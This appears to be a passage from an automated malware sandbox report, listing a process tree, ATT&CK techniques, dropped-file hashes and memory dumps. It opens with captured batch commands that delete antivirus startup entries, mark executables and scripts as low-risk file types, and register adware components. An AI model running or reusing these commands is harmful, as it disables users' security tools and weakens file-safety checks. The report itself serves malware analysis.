"SBRegRebootCleaner" /f Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "egui" /f Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "IseUI" /f Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "COMODO Internet Security" /f Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "ClamWin" /f Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Avira SystrayStartTrigger" /f Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "AVGUI.exe" /f Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "SUPERAntiSpyware" /f Reg Delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "SUPERAntiSpyware" /f ) else ( Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Associations" /v "DefaultFileTypeRisk" /t REG_DWORD /d "24914" /f /reg:64 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Associations" /v "LowRiskFileTypes" /t REG_SZ /d ".zip;.rar;.nfo;.txt;.exe;.bat;.com;.cmd;.reg;.msi;.htm;.html;.gif;.bmp;.jpg;.avi;.mpg;.mpeg;.mov;.mp3;.m3u;.wav;" /f /reg:64 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Attachments" /v "HideZoneInfoOnProperties" /t REG_DWORD /d "1" /f /reg:64 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Attachments" /v "SaveZoneInformation" /t REG_DWORD /d "2" /f /reg:64 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}" /v "DisplayName" /t REG_SZ /d "RelevantKnowledge" /f /reg:32 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}" /v "UninstallString" /t REG_SZ /d "%ProgramFiles(x86)%\RelevantKnowledge\rlvknlg.exe -bootremove -uninst:RelevantKnowledge" /f /reg:32 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config" /v "HK_Path" /t REG_SZ /d "%windir%\system32\rlls.dll" /f /reg:32 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config" /v "HK64_Path" /t REG_SZ /d "%windir%\system32\rlls64.dll" /f /reg:32 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config" /v "LD64_Path" /t REG_SZ /d "%ProgramFiles(x86)%\RelevantKnowledge\rlvknlg64.exe" /f /reg:32 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config" /v "KS_Path" /t REG_SZ /d "%ProgramFiles(x86)%\RelevantKnowledge\rlls.dll" /f /reg:32 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config" /v "SV_Path" /t REG_SZ /d "%ProgramFiles(x86)%\RelevantKnowledge\rlservice.exe" /f /reg:32 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config\OSSProxy" /v "" /t REG_SZ /d "" /f /reg:32 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config\OSSProxy\Settings" /v "RunLine" /t REG_SZ /d "%ProgramFiles(x86)%\RelevantKnowledge\rlvknlg.exe -boot" /f /reg:32 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config\OSSProxy\Settings" /v "ServiceName" /t REG_SZ /d "RelevantKnowledge" /f /reg:32 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config\OSSProxy\Settings" /v "UninstURL" /t REG_SZ /d "http://www.relevantknowledge.com/confirmuninstall.aspx?siteid=2600&campaign_id=794" /f /reg:32 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config\OSSProxy\Settings" /v "RevertPath" /t REG_SZ /d "%ProgramFiles(x86)%\RelevantKnowledge" /f /reg:32 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "AvastUI.exe" /f /reg:32 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "QHSafeTray" /f /reg:32 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Zillya Antivirus" /f /reg:32 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "SBAMTray" /f /reg:32 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "SBRegRebootCleaner" /f /reg:32 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "egui" /f /reg:32 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "IseUI" /f /reg:32 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "COMODO Internet Security" /f /reg:32 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "ClamWin" /f /reg:32 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Avira SystrayStartTrigger" /f /reg:32 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "AVGUI.exe" /f /reg:32 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "SUPERAntiSpyware" /f /reg:32 Reg Delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "SUPERAntiSpyware" /f /reg:32 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "AvastUI.exe" /f /reg:64 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "QHSafeTray" /f /reg:64 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Zillya Antivirus" /f /reg:64 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "SBAMTray" /f /reg:64 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "SBRegRebootCleaner" /f /reg:64 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "egui" /f /reg:64 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "IseUI" /f /reg:64 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "COMODO Internet Security" /f /reg:64 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "ClamWin" /f /reg:64 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Avira SystrayStartTrigger" /f /reg:64 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "AVGUI.exe" /f /reg:64 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "SUPERAntiSpyware" /f /reg:64 Reg Delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "SUPERAntiSpyware" /f /reg:64 )
      4⤵
      PID:3400

C:\Users\Admin\AppData\Local\Temp\4577.exe
C:\Users\Admin\AppData\Local\Temp\4577.exe
1⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:1332
- C:\Windows\SysWOW64\cmd.exe
  cmd /Q /C C:\Users\Admin\AppData\Local\Temp/s.bat
  2⤵
  - Drops startup file
  PID:1788

C:\Users\Admin\AppData\Local\Temp\470E.exe
C:\Users\Admin\AppData\Local\Temp\470E.exe
1⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2684
- C:\Users\Admin\AppData\Local\Temp\470E.exe
  C:\Users\Admin\AppData\Local\Temp\470E.exe
  2⤵
  - Executes dropped EXE
  - Loads dropped DLL
  PID:1488
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 1488 -s 1460
    3⤵
    - Program crash
    - Suspicious use of AdjustPrivilegeToken
    PID:4064

C:\Users\Admin\AppData\Local\Temp\4E53.exe
C:\Users\Admin\AppData\Local\Temp\4E53.exe
1⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of AdjustPrivilegeToken
PID:3880

C:\Users\Admin\AppData\Local\Temp\A5F9.exe
C:\Users\Admin\AppData\Local\Temp\A5F9.exe
1⤵
- Executes dropped EXE
PID:2224
- C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -u -p 2224 -s 736
  2⤵
  - Program crash
  - Suspicious use of AdjustPrivilegeToken
  PID:4028
- C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -u -p 2224 -s 720
  2⤵
  - Program crash
  - Suspicious use of AdjustPrivilegeToken
  PID:3888
- C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -u -p 2224 -s 848
  2⤵
  - Program crash
  - Suspicious use of AdjustPrivilegeToken
  PID:1524
- C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -u -p 2224 -s 884
  2⤵
  - Program crash
  - Suspicious use of AdjustPrivilegeToken
  PID:1416
- C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -u -p 2224 -s 852
  2⤵
  - Suspicious use of NtCreateProcessExOtherParentProcess
  - Program crash
  - Suspicious use of AdjustPrivilegeToken
  PID:3600

C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
1⤵
PID:3240

C:\Windows\explorer.exe
C:\Windows\explorer.exe
1⤵
PID:3812

C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
1⤵
PID:2120

C:\Windows\explorer.exe
C:\Windows\explorer.exe
1⤵
PID:3896

C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
1⤵
PID:4068

C:\Windows\explorer.exe
C:\Windows\explorer.exe
1⤵
PID:2372

C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
1⤵
PID:2464

C:\Windows\explorer.exe
C:\Windows\explorer.exe
1⤵
PID:2108

C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
1⤵
PID:416

C:\Users\Admin\AppData\Roaming\wgsbiwi
C:\Users\Admin\AppData\Roaming\wgsbiwi
1⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:204
- C:\Users\Admin\AppData\Roaming\wgsbiwi
  C:\Users\Admin\AppData\Roaming\wgsbiwi
  2⤵
  - Executes dropped EXE
  - Checks SCSI registry key(s)
  PID:3548

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Modify Existing Service

T1031

Registry Run Keys / Startup Folder

T1060

Privilege Escalation

Defense Evasion

Disabling Security Tools

T1089

Modify Registry

T1112

Virtualization/Sandbox Evasion

T1497

Credential Access

Credentials in Files

T1081

Discovery

Peripheral Device Discovery

T1120

Query Registry

T1012

System Information Discovery

T1082

Virtualization/Sandbox Evasion

T1497

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\ProgramData\Runtimebroker.exe

MD5
ab2f76d60587996ba3cd8782785caaa5

SHA1
0ff116d90610baae4db4d72f6ac11989b7a0e420

SHA256
34a8beebd1799b5fb7b9651fc77e8ce7261b111bd3d91ccb8558910925aa2db7

SHA512
c2e71e373c0ca83dc4b3e045a765dc35cee35549d84250911c78d13c2191d1a836a9554bd63e5faae78a3393a3d86d7e432f05a2caf9c0c224d0d50673cc5392

Download Submit
C:\ProgramData\Runtimebroker.exe

MD5
ab2f76d60587996ba3cd8782785caaa5

SHA1
0ff116d90610baae4db4d72f6ac11989b7a0e420

SHA256
34a8beebd1799b5fb7b9651fc77e8ce7261b111bd3d91ccb8558910925aa2db7

SHA512
c2e71e373c0ca83dc4b3e045a765dc35cee35549d84250911c78d13c2191d1a836a9554bd63e5faae78a3393a3d86d7e432f05a2caf9c0c224d0d50673cc5392

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

MD5
c558fdaa3884f969f1ec904ae7bbd991

SHA1
b4f85d04f6bf061a17f52c264c065b786cfd33ff

SHA256
3e2559b6ca355d011b05b1fcf35ed8b2375586fe6bb01bc367f24eb8ac82975e

SHA512
6523c778fd9fab0085fafe7b4049e591403865212cc25109cb11f11584c7258bc15e0a5524d089d0f662151b22f3f8e6f871091cec57064c69a9a95903f9e7d4

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5
ae6a621c58440f45941bae3051959c09

SHA1
7bfff6790b2e4002a1aacf11838323214b1aa279

SHA256
4566b5e56ac64049264621d4c61d47d9d794130c0a4c15d9110d2fdbbe45404c

SHA512
4d1e995a5e4b745988d06d625aa35a50f21695f26f9c858836fbf686d360ee677f0c4ab3120ead12950cac69714052272b9596281d8f621f05b044e0f34448a8

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5
f4f47ea9b1452d0fca1b1a17b5b22503

SHA1
7fb0f91d079599c9c51cbec70411550dd092714d

SHA256
e21efc413b73a899ecc59f9be24e9459143a72a73a88e4dac7f8a265b65cda64

SHA512
40da04632041b8691d20e952f490ee1f6adf7bce994ded198547e4213da19c000b13a5ad36e1f308dc66fbf8c5062dbb90c366451d84b96fa54c8bf9cb1ed6e0

Download Submit
C:\Users\Admin\AppData\Local\Temp\42F5.exe

MD5
ab2f76d60587996ba3cd8782785caaa5

SHA1
0ff116d90610baae4db4d72f6ac11989b7a0e420

SHA256
34a8beebd1799b5fb7b9651fc77e8ce7261b111bd3d91ccb8558910925aa2db7

SHA512
c2e71e373c0ca83dc4b3e045a765dc35cee35549d84250911c78d13c2191d1a836a9554bd63e5faae78a3393a3d86d7e432f05a2caf9c0c224d0d50673cc5392

Download Submit
C:\Users\Admin\AppData\Local\Temp\42F5.exe

MD5
ab2f76d60587996ba3cd8782785caaa5

SHA1
0ff116d90610baae4db4d72f6ac11989b7a0e420

SHA256
34a8beebd1799b5fb7b9651fc77e8ce7261b111bd3d91ccb8558910925aa2db7

SHA512
c2e71e373c0ca83dc4b3e045a765dc35cee35549d84250911c78d13c2191d1a836a9554bd63e5faae78a3393a3d86d7e432f05a2caf9c0c224d0d50673cc5392

Download Submit
C:\Users\Admin\AppData\Local\Temp\4577.exe

MD5
b19ac380411ed5d8b5a7e7e0c1da61a6

SHA1
9665c20336a5ce437bbf7b564370bfa43e99954c

SHA256
aba88a19b2f6e2cf9a6a41ab8661d83c433acec363028f58dd74d37e335c7619

SHA512
73b4e3555cf9496a7138a2c7071ed81a754493afaf15f604a305f3eb051ed72645731a6174b0934f24371dbe5bd8c0185516f87778a018d84df4fff8aea0c208

Download Submit
C:\Users\Admin\AppData\Local\Temp\4577.exe

MD5
b19ac380411ed5d8b5a7e7e0c1da61a6

SHA1
9665c20336a5ce437bbf7b564370bfa43e99954c

SHA256
aba88a19b2f6e2cf9a6a41ab8661d83c433acec363028f58dd74d37e335c7619

SHA512
73b4e3555cf9496a7138a2c7071ed81a754493afaf15f604a305f3eb051ed72645731a6174b0934f24371dbe5bd8c0185516f87778a018d84df4fff8aea0c208

Download Submit
C:\Users\Admin\AppData\Local\Temp\470E.exe

MD5
5707ddada5b7ea6bef434cd294fa12e1

SHA1
45bb285a597b30e100ed4b15d96a29d718697e5e

SHA256
85205aa3ad824b5172d5da841d253c3a54aff5d00eb2c208029e9453008f132c

SHA512
91cbdbf8da7e4e34de45a99359bdc321a66d6646ed14a1042346824c8daa6237281eff3b00fd162009c5e3204e5a7cd3b944f05e18b7f9066d0f9dd16b56bf13

Download Submit
C:\Users\Admin\AppData\Local\Temp\470E.exe

MD5
5707ddada5b7ea6bef434cd294fa12e1

SHA1
45bb285a597b30e100ed4b15d96a29d718697e5e

SHA256
85205aa3ad824b5172d5da841d253c3a54aff5d00eb2c208029e9453008f132c

SHA512
91cbdbf8da7e4e34de45a99359bdc321a66d6646ed14a1042346824c8daa6237281eff3b00fd162009c5e3204e5a7cd3b944f05e18b7f9066d0f9dd16b56bf13

Download Submit
C:\Users\Admin\AppData\Local\Temp\470E.exe

MD5
5707ddada5b7ea6bef434cd294fa12e1

SHA1
45bb285a597b30e100ed4b15d96a29d718697e5e

SHA256
85205aa3ad824b5172d5da841d253c3a54aff5d00eb2c208029e9453008f132c

SHA512
91cbdbf8da7e4e34de45a99359bdc321a66d6646ed14a1042346824c8daa6237281eff3b00fd162009c5e3204e5a7cd3b944f05e18b7f9066d0f9dd16b56bf13

Download Submit
C:\Users\Admin\AppData\Local\Temp\4E53.exe

MD5
717d65dba56f47e540dca074c3977b3d

SHA1
d58aa30f826f41663e693f0ad930fdce584f1672

SHA256
61fb1160ae372d9ba1c95400d5439450c6a66cdf073fa50ee2d5d10c4952cbb3

SHA512
b06e4358411eb8f6315c574922c021bd57218b3e6a0ed727df6b44e20e7818d40fb0347050ce9145ea7e0fd56a7fa93a2358e524c0df030d6d44067c7c83510d

Download Submit
C:\Users\Admin\AppData\Local\Temp\4E53.exe

MD5
717d65dba56f47e540dca074c3977b3d

SHA1
d58aa30f826f41663e693f0ad930fdce584f1672

SHA256
61fb1160ae372d9ba1c95400d5439450c6a66cdf073fa50ee2d5d10c4952cbb3

SHA512
b06e4358411eb8f6315c574922c021bd57218b3e6a0ed727df6b44e20e7818d40fb0347050ce9145ea7e0fd56a7fa93a2358e524c0df030d6d44067c7c83510d

Download Submit
C:\Users\Admin\AppData\Local\Temp\A5F9.exe

MD5
86f3431da4c9f0e9bad6c71aab03ec60

SHA1
3a94f295514a29e772932a005bc54a77de3d3610

SHA256
b7264c22c5d356ad379f426e67230d2d4d6ebbeddf5a155ee5e94fbbcd28a99f

SHA512
5ed65233b0ac1cc45d959066a173da5b47e44141ef76ddde1c22ecc76f0b88594e105884f9846c049538ad3becb01c699a045051699fa96b64f3b956c2d78861

Download Submit
C:\Users\Admin\AppData\Local\Temp\A5F9.exe

MD5
86f3431da4c9f0e9bad6c71aab03ec60

SHA1
3a94f295514a29e772932a005bc54a77de3d3610

SHA256
b7264c22c5d356ad379f426e67230d2d4d6ebbeddf5a155ee5e94fbbcd28a99f

SHA512
5ed65233b0ac1cc45d959066a173da5b47e44141ef76ddde1c22ecc76f0b88594e105884f9846c049538ad3becb01c699a045051699fa96b64f3b956c2d78861

Download Submit
C:\Users\Admin\AppData\Local\Temp\s.bat

MD5
a6784eb9a3c3e2c325cf932fa7fff9c1

SHA1
9129a89ad09a016d25143a086b19797e5e0ce183

SHA256
763950ec26f8e940a70c52085965a33e6371f3dec1d7b945a1e96f3918916c70

SHA512
3827f85aad3b7d83ebcf3ecab990aba578512b82e2c2461ea600dee9e34cfed48b2c72e8412ea5d2d986f7db4f39080cdcc3d1289f957cb09cfbac56c5162575

Download Submit
C:\Users\Admin\AppData\Roaming\wgsbiwi

MD5
06a029882deabf229f62728afe3baf4f

SHA1
33a5953fbcce8761af1e68df9c9f4ad153c4a536

SHA256
f24a559e79ba3121c7e0fed4ac995da056fe6a0dac71b2360f9e340b97117d05

SHA512
a81631eef6163f437e5bdf83156d26856653411dc6b9becc5580a83b9a4123faec5855d625beec15b1f71c3155624187f776f56b4f58e5f87e9f39bd8b61ba88

Download Submit
C:\Users\Admin\AppData\Roaming\wgsbiwi

MD5
06a029882deabf229f62728afe3baf4f

SHA1
33a5953fbcce8761af1e68df9c9f4ad153c4a536

SHA256
f24a559e79ba3121c7e0fed4ac995da056fe6a0dac71b2360f9e340b97117d05

SHA512
a81631eef6163f437e5bdf83156d26856653411dc6b9becc5580a83b9a4123faec5855d625beec15b1f71c3155624187f776f56b4f58e5f87e9f39bd8b61ba88

Download Submit
C:\Users\Admin\AppData\Roaming\wgsbiwi

MD5
06a029882deabf229f62728afe3baf4f

SHA1
33a5953fbcce8761af1e68df9c9f4ad153c4a536

SHA256
f24a559e79ba3121c7e0fed4ac995da056fe6a0dac71b2360f9e340b97117d05

SHA512
a81631eef6163f437e5bdf83156d26856653411dc6b9becc5580a83b9a4123faec5855d625beec15b1f71c3155624187f776f56b4f58e5f87e9f39bd8b61ba88

Download Submit
\Users\Admin\AppData\LocalLow\sqlite3.dll

MD5
f964811b68f9f1487c2b41e1aef576ce

SHA1
b423959793f14b1416bc3b7051bed58a1034025f

SHA256
83bc57dcf282264f2b00c21ce0339eac20fcb7401f7c5472c0cd0c014844e5f7

SHA512
565b1a7291c6fcb63205907fcd9e72fc2e11ca945afc4468c378edba882e2f314c2ac21a7263880ff7d4b84c2a1678024c1ac9971ac1c1de2bfa4248ec0f98c4

Download Submit
memory/416-358-0x0000000000340000-0x0000000000349000-memory.dmp

Filesize
36KB

Download
memory/416-357-0x0000000000350000-0x0000000000355000-memory.dmp

Filesize
20KB

Download
memory/416-342-0x0000000000000000-mapping.dmp

Download
memory/648-114-0x0000000000030000-0x000000000003A000-memory.dmp

Filesize
40KB

Download
memory/688-126-0x0000000002C80000-0x0000000002D2E000-memory.dmp

Filesize
696KB

Download
memory/688-129-0x0000000000400000-0x0000000002C7C000-memory.dmp

Filesize
40.5MB

Download
memory/688-118-0x0000000000000000-mapping.dmp

Download
memory/856-156-0x0000000004870000-0x00000000048AB000-memory.dmp

Filesize
236KB

Download
memory/856-158-0x0000000000400000-0x0000000002C7C000-memory.dmp

Filesize
40.5MB

Download
memory/856-150-0x0000000000000000-mapping.dmp

Download
memory/1332-155-0x0000000000400000-0x0000000002D86000-memory.dmp

Filesize
41.5MB

Download
memory/1332-153-0x00000000054D0000-0x00000000056E1000-memory.dmp

Filesize
2.1MB

Download
memory/1332-139-0x0000000003420000-0x0000000003663000-memory.dmp

Filesize
2.3MB

Download
memory/1332-142-0x0000000000400000-0x0000000002D86000-memory.dmp

Filesize
41.5MB

Download
memory/1332-121-0x0000000000000000-mapping.dmp

Download
memory/1488-195-0x000000000044003F-mapping.dmp

Download
memory/1488-212-0x0000000000400000-0x0000000000495000-memory.dmp

Filesize
596KB

Download
memory/1488-194-0x0000000000400000-0x0000000000495000-memory.dmp

Filesize
596KB

Download
memory/1788-154-0x0000000000000000-mapping.dmp

Download
memory/2080-283-0x0000000006FC3000-0x0000000006FC4000-memory.dmp

Filesize
4KB

Download
memory/2080-239-0x0000000000000000-mapping.dmp

Download
memory/2080-251-0x0000000006FC0000-0x0000000006FC1000-memory.dmp

Filesize
4KB

Download
memory/2080-252-0x0000000006FC2000-0x0000000006FC3000-memory.dmp

Filesize
4KB

Download
memory/2080-266-0x00000000093F0000-0x0000000009423000-memory.dmp

Filesize
204KB

Download
memory/2080-280-0x000000007EF20000-0x000000007EF21000-memory.dmp

Filesize
4KB

Download
memory/2108-331-0x0000000000D60000-0x0000000000D65000-memory.dmp

Filesize
20KB

Download
memory/2108-333-0x0000000000D50000-0x0000000000D59000-memory.dmp

Filesize
36KB

Download
memory/2108-285-0x0000000000000000-mapping.dmp

Download
memory/2120-231-0x0000000000000000-mapping.dmp

Download
memory/2120-233-0x0000000000A30000-0x0000000000A37000-memory.dmp

Filesize
28KB

Download
memory/2120-234-0x0000000000A20000-0x0000000000A2B000-memory.dmp

Filesize
44KB

Download
memory/2224-226-0x0000000004830000-0x00000000048C1000-memory.dmp

Filesize
580KB

Download
memory/2224-222-0x0000000000400000-0x0000000002CA9000-memory.dmp

Filesize
40.7MB

Download
memory/2224-207-0x0000000000000000-mapping.dmp

Download
memory/2372-258-0x0000000000000000-mapping.dmp

Download
memory/2372-262-0x0000000000A10000-0x0000000000A16000-memory.dmp

Filesize
24KB

Download
memory/2372-264-0x0000000000A00000-0x0000000000A0C000-memory.dmp

Filesize
48KB

Download
memory/2428-117-0x0000000000440000-0x0000000000456000-memory.dmp

Filesize
88KB

Download
memory/2464-282-0x0000000000F90000-0x0000000000F99000-memory.dmp

Filesize
36KB

Download
memory/2464-270-0x0000000000000000-mapping.dmp

Download
memory/2464-281-0x0000000000FA0000-0x0000000000FA4000-memory.dmp

Filesize
16KB

Download
memory/2684-146-0x0000000004CC0000-0x0000000004CC1000-memory.dmp

Filesize
4KB

Download
memory/2684-135-0x0000000004D10000-0x0000000004D11000-memory.dmp

Filesize
4KB

Download
memory/2684-128-0x0000000000320000-0x0000000000321000-memory.dmp

Filesize
4KB

Download
memory/2684-124-0x0000000000000000-mapping.dmp

Download
memory/2684-192-0x0000000004F00000-0x0000000004F21000-memory.dmp

Filesize
132KB

Download
memory/2684-141-0x0000000004C70000-0x000000000516E000-memory.dmp

Filesize
5.0MB

Download
memory/2684-131-0x0000000005170000-0x0000000005171000-memory.dmp

Filesize
4KB

Download
memory/3240-219-0x0000000000700000-0x0000000000774000-memory.dmp

Filesize
464KB

Download
memory/3240-223-0x0000000000690000-0x00000000006FB000-memory.dmp

Filesize
428KB

Download
memory/3240-215-0x0000000000000000-mapping.dmp

Download
memory/3400-508-0x0000000000000000-mapping.dmp

Download
memory/3548-512-0x0000000000402E1A-mapping.dmp

Download
memory/3584-116-0x0000000000402E1A-mapping.dmp

Download
memory/3584-115-0x0000000000400000-0x0000000000409000-memory.dmp

Filesize
36KB

Download
memory/3728-185-0x0000000009630000-0x0000000009631000-memory.dmp

Filesize
4KB

Download
memory/3728-184-0x0000000009980000-0x0000000009981000-memory.dmp

Filesize
4KB

Download
memory/3728-170-0x0000000008240000-0x0000000008241000-memory.dmp

Filesize
4KB

Download
memory/3728-169-0x00000000080D0000-0x00000000080D1000-memory.dmp

Filesize
4KB

Download
memory/3728-167-0x0000000004EB2000-0x0000000004EB3000-memory.dmp

Filesize
4KB

Download
memory/3728-176-0x0000000008190000-0x0000000008191000-memory.dmp

Filesize
4KB

Download
memory/3728-166-0x0000000004EB0000-0x0000000004EB1000-memory.dmp

Filesize
4KB

Download
memory/3728-165-0x0000000007880000-0x0000000007881000-memory.dmp

Filesize
4KB

Download
memory/3728-172-0x00000000082B0000-0x00000000082B1000-memory.dmp

Filesize
4KB

Download
memory/3728-164-0x0000000004EC0000-0x0000000004EC1000-memory.dmp

Filesize
4KB

Download
memory/3728-191-0x0000000004EB3000-0x0000000004EB4000-memory.dmp

Filesize
4KB

Download
memory/3728-186-0x00000000096A0000-0x00000000096A1000-memory.dmp

Filesize
4KB

Download
memory/3728-159-0x0000000000000000-mapping.dmp

Download
memory/3812-220-0x0000000000000000-mapping.dmp

Download
memory/3812-224-0x0000000000F70000-0x0000000000F77000-memory.dmp

Filesize
28KB

Download
memory/3812-225-0x0000000000F60000-0x0000000000F6C000-memory.dmp

Filesize
48KB

Download
memory/3860-236-0x0000000009360000-0x00000000094BB000-memory.dmp

Filesize
1.4MB

Download
memory/3860-232-0x0000000006B33000-0x0000000006B34000-memory.dmp

Filesize
4KB

Download
memory/3860-193-0x0000000000000000-mapping.dmp

Download
memory/3860-229-0x00000000097F0000-0x00000000097F1000-memory.dmp

Filesize
4KB

Download
memory/3860-205-0x0000000007A90000-0x0000000007A91000-memory.dmp

Filesize
4KB

Download
memory/3860-213-0x0000000006B30000-0x0000000006B31000-memory.dmp

Filesize
4KB

Download
memory/3860-214-0x0000000006B32000-0x0000000006B33000-memory.dmp

Filesize
4KB

Download
memory/3880-163-0x0000000006C60000-0x0000000006C61000-memory.dmp

Filesize
4KB

Download
memory/3880-160-0x0000000006560000-0x0000000006561000-memory.dmp

Filesize
4KB

Download
memory/3880-132-0x0000000000000000-mapping.dmp

Download
memory/3880-168-0x00000000067E0000-0x00000000067E1000-memory.dmp

Filesize
4KB

Download
memory/3880-137-0x0000000001280000-0x0000000001281000-memory.dmp

Filesize
4KB

Download
memory/3880-178-0x0000000006B30000-0x0000000006B31000-memory.dmp

Filesize
4KB

Download
memory/3880-140-0x00000000779F0000-0x0000000077B7E000-memory.dmp

Filesize
1.6MB

Download
memory/3880-143-0x0000000005670000-0x0000000005671000-memory.dmp

Filesize
4KB

Download
memory/3880-144-0x00000000050D0000-0x00000000050D1000-memory.dmp

Filesize
4KB

Download
memory/3880-173-0x00000000069E0000-0x00000000069E1000-memory.dmp

Filesize
4KB

Download
memory/3880-145-0x0000000005130000-0x0000000005131000-memory.dmp

Filesize
4KB

Download
memory/3880-149-0x0000000005320000-0x0000000005321000-memory.dmp

Filesize
4KB

Download
memory/3880-148-0x0000000005050000-0x0000000005051000-memory.dmp

Filesize
4KB

Download
memory/3880-147-0x0000000005170000-0x0000000005171000-memory.dmp

Filesize
4KB

Download
memory/3896-235-0x0000000000000000-mapping.dmp

Download
memory/3896-237-0x0000000000F00000-0x0000000000F09000-memory.dmp

Filesize
36KB

Download
